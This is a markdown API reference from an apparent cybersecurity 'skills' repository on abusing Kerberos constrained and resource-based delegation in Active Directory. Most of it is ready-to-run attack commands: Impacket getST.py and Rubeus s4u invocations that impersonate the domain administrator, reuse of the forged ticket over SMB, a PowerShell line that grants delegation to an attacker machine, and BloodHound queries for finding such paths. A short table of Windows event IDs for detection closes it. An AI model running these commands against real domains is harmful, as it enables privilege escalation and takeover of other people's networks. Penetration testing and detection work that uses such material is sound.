creator/Anthropic-Cybersecurity-Skills
1
0
Fork 0
mirror of https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git synced 2026-06-12 06:04:56 +03:00
Code Issues Packages Projects Releases Wiki Activity
Files
d5f3fa32486ea335db802d68fe2147fa2da69583
Anthropic-Cybersecurity-Skills/skills/exploiting-constrained-delegation-abuse/references/api-reference.md
T
mukul975 c21af3347e Complete folder anatomy for all 649 cybersecurity skills + update LICENSE to Mahipal 
- Add scripts/agent.py and references/api-reference.md to all remaining skills
- Update all 648 LICENSE files: copyright now reads 'Mahipal'
- Add implementing-security-monitoring-with-datadog (new skill with full anatomy)
- All 649 skills now have: SKILL.md, LICENSE, scripts/agent.py, references/api-reference.md
2026-03-11 00:22:12 +01:00

90 lines
2.2 KiB
Markdown
Raw Blame History

# API Reference: Kerberos Constrained Delegation Abuse
## Delegation Types in AD
| Type | Attribute | Risk |
|------|-----------|------|
| Unconstrained | TrustedForDelegation | CRITICAL |
| Constrained | msDS-AllowedToDelegateTo | HIGH |
| Constrained + Protocol Transition | TrustedToAuthForDelegation | CRITICAL |
| Resource-Based (RBCD) | msDS-AllowedToActOnBehalfOfOtherIdentity | HIGH |
## PowerShell Enumeration
### Find Constrained Delegation
```powershell
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} `
-Properties msDS-AllowedToDelegateTo, TrustedToAuthForDelegation
```
### Find RBCD
```powershell
Get-ADComputer -Filter * -Properties msDS-AllowedToActOnBehalfOfOtherIdentity `
| Where-Object {$_.'msDS-AllowedToActOnBehalfOfOtherIdentity' -ne $null}
```
## Impacket — S4U Attack
### getST.py — Request Service Ticket
```bash
getST.py domain/svc_account:password \
-spn cifs/target.domain.local \
-impersonate administrator \
-dc-ip 10.10.10.1
```
### Use Ticket
```bash
export KRB5CCNAME=administrator.ccache
smbclient.py -k -no-pass domain/administrator@target.domain.local
```
## Rubeus — S4U Attack
### S4U2Self + S4U2Proxy
```cmd
Rubeus.exe s4u /user:svc_account /rc4:NTLM_HASH \
/impersonateuser:administrator \
/msdsspn:cifs/target.domain.local /ptt
```
### RBCD Abuse
```cmd
Rubeus.exe s4u /user:MACHINE$ /rc4:MACHINE_HASH \
/impersonateuser:administrator \
/msdsspn:cifs/target.domain.local /ptt
```
## RBCD Setup with PowerShell
### Set RBCD
```powershell
Set-ADComputer target -PrincipalsAllowedToDelegateToAccount attacker$
```
### Verify
```powershell
Get-ADComputer target -Properties msDS-AllowedToActOnBehalfOfOtherIdentity
```
## BloodHound Cypher Queries
### Constrained Delegation Paths
```cypher
MATCH p=(u)-[:AllowedToDelegate]->(c:Computer)
RETURN u.name, c.name
```
### RBCD Write Access
```cypher
MATCH p=(u)-[:GenericWrite|WriteDacl|WriteOwner]->(c:Computer)
RETURN u.name, c.name
```
## Detection — Event IDs
| Event | Description |
|-------|-------------|
| 4769 | Kerberos Service Ticket (check for S4U) |
| 4770 | Service Ticket Renewed |
| 4768 | TGT Request (monitor for delegation) |
Reference in New Issue View Git Blame Copy Permalink